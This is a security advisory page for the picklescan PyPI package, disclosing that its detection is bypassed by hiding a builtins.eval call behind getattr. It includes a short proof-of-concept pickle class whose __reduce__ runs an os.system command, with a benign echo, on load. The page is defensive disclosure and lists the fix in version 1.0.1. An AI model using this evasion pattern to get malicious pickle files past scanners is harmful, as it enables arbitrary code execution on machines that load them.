GHSA-9m3x-qqw2-h32h
Suggest an improvement- Source
- https://github.com/advisories/GHSA-9m3x-qqw2-h32h
- Import Source
- https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/02/GHSA-9m3x-qqw2-h32h/GHSA-9m3x-qqw2-h32h.json
- JSON Data
- https://api.osv.dev/v1/vulns/GHSA-9m3x-qqw2-h32h
- Published
- 2026-02-02T20:45:20Z
- Modified
- 2026-02-03T17:52:24.343838Z
- Severity
-
- 8.9 (High) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P CVSS Calculator
- Summary
- picklescan missing detection by simple obfuscation of a `builtins.eval` call
- Details
-
Summary
An unsafe deserialization vulnerability allows any unauthenticated user to execute arbitrary code on the host loading a pickle payload from an untrusted source.
Details
It's possible to hide the
evalcall nested under another callable viagetattr.PoC
import builtins class EvilClass: @staticmethod def _obfuscated_eval(payload): getattr(builtins, "eval")(payload) def __reduce__(self): payload = "__import__('os').system('echo \"successful attack\"')" return self._obfuscated_eval, (payload,)Impact
Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files from untrusted sources.
What is the impact? Attackers can embed malicious code in pickle file that remains undetected but executes when the pickle file is loaded.
Supply Chain Attack: Attackers can distribute infected pickle files to system that load serialized ML models, APIs, or saved Python objects from untrusted sources.
- Database specific
{ "github_reviewed": true, "github_reviewed_at": "2026-02-02T20:45:20Z", "severity": "HIGH", "nvd_published_at": null, "cwe_ids": [ "CWE-502" ] }- References
-
- https://github.com/mmaitre314/picklescan/security/advisories/GHSA-9m3x-qqw2-h32h
- https://github.com/mmaitre314/picklescan/pull/59
- https://github.com/mmaitre314/picklescan/commit/173c8f2a869ea9b69b543477525ec70611c3c6f4
- https://github.com/mmaitre314/picklescan
- https://github.com/mmaitre314/picklescan/releases/tag/v1.0.1
Affected packages
PyPI / picklescan
Package
- Name
- picklescan
- View open source insights on deps.dev
- Purl
- pkg:pypi/picklescan
Affected ranges
- Type
- ECOSYSTEM
- Events
-
Introduced0Unknown introduced version / All previous versions are affectedFixed1.0.1